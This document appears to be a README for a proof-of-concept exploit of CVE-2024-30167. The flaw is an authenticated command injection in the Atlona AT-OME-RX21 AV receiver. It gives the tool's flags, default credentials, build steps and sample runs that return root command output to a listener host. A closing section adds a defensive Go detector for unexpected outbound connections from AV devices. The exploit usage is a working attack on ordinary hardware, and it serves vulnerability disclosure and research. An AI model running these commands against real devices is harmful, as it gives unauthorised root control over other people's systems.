Disclaimer: This proof of concept is provided solely for educational and research purposes. Do not use this code on systems you do not own or have explicit permission to test. I am not responsible for any misuse.
An authenticated command injection vulnerability exists in the time configuration interface of the Atlona AT-OME-RX21 AV switcher. A user with valid credentials can inject operating system commands that execute as root, leading to full system compromise.
Atlona AT-OME-RX21 is an AV (audio/visual) receiver and scaler designed for professional video conferencing and collaboration environments. It is mostly used in conference rooms, classrooms and huddle spaces. It helps connect devices like laptops/conferencing systems to displays.
This PoC works against all firmware versions <= 1.5.1.
Vendor info: https://atlona.com/product/at-ome-rx21/
$ .\cve-2024-30167.exe -h
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Usage of cve-2024-30167.exe:
-P string
listening port for command output (default "4444")
-c string
Command to execute on the target
-l string
listening host for command output
-p string
Password for authentication (default "Atlona")
-t string
Target URL (e.g: http://example.com)
-u string
Username for authentication (default "admin")
- Create a binary for your system
go build -o <OUTPUT_FILENAME>
- Run the exploit against the target Atlona device
$ .\cve-2024-30167.exe -P 8000 -c 'whoami' -l 192.168.1.100 -t http://192.168.1.103:1337
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Listening on 192.168.1.100:8000 for response...
Command Injection Successful
=====Received Response=====
root
$ .\cve-2024-30167.exe -P 8000 -c 'id' -l 192.168.1.100 -t http://192.168.1.103:1337
▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████
██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀
▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀
PoC by: github.com/RIZZZIOM
Listening on 192.168.1.100:8000 for response...
Command Injection Successful
=====Received Response=====
uid=0(root) gid=0(root) groups=0(root)
The above command uses the default credentials to log in to the device.
SYNTAX:
.\cve-2024-30167.exe -P <listening_port> -c <command> -l <listener_host> -t <target_uri> -u <username> -p <password>
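In the runs above the command output arrives at a separate listener host and port, so from the network's point of view the AV receiver opens an outbound connection it would not normally make. The following is an added detection example, not part of this PoC or of any Atlona code: it scans flow records for connections that originate from inventoried AV devices and go to destinations outside an allowlist. The flow record format, the device inventory, and the allowlisted NTP server are assumptions, and the sample records are constructed.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// Constructed sample flow records in an assumed format: "timestamp src dst dport".
const sampleFlows = `2024-05-01T10:00:01Z 192.168.1.103 192.168.1.10 123
2024-05-01T10:00:07Z 192.168.1.50 192.168.1.103 80
2024-05-01T10:02:13Z 192.168.1.103 192.168.1.100 8000
malformed line
2024-05-01T10:05:00Z 192.168.1.104 192.168.1.10 123`

// Alert describes an AV endpoint opening a connection it has no reason to make.
type Alert struct{ Time, Device, Dest string }

// FindCallbacks returns flows that originate from an inventoried AV device
// and go to a destination (ip:port) that is not on the allowlist.
// Inbound management traffic to the device is ignored: only the source is matched.
func FindCallbacks(flows string, avDevices, allowed map[string]bool) []Alert {
	var alerts []Alert
	sc := bufio.NewScanner(strings.NewReader(flows))
	for sc.Scan() {
		f := strings.Fields(sc.Text())
		if len(f) != 4 {
			continue // skip records that do not parse
		}
		ts, src, dest := f[0], f[1], f[2]+":"+f[3]
		if avDevices[src] && !allowed[dest] {
			alerts = append(alerts, Alert{Time: ts, Device: src, Dest: dest})
		}
	}
	return alerts
}

func main() {
	// Hypothetical inventory of AV receivers and their expected destinations.
	av := map[string]bool{"192.168.1.103": true, "192.168.1.104": true}
	ok := map[string]bool{"192.168.1.10:123": true} // assumed site NTP server
	for _, a := range FindCallbacks(sampleFlows, av, ok) {
		fmt.Printf("%s %s -> %s: unexpected outbound connection\n", a.Time, a.Device, a.Dest)
	}
}
```

Keeping the allowlist per site short (time server, control system) makes any other outbound connection from these devices worth an alert.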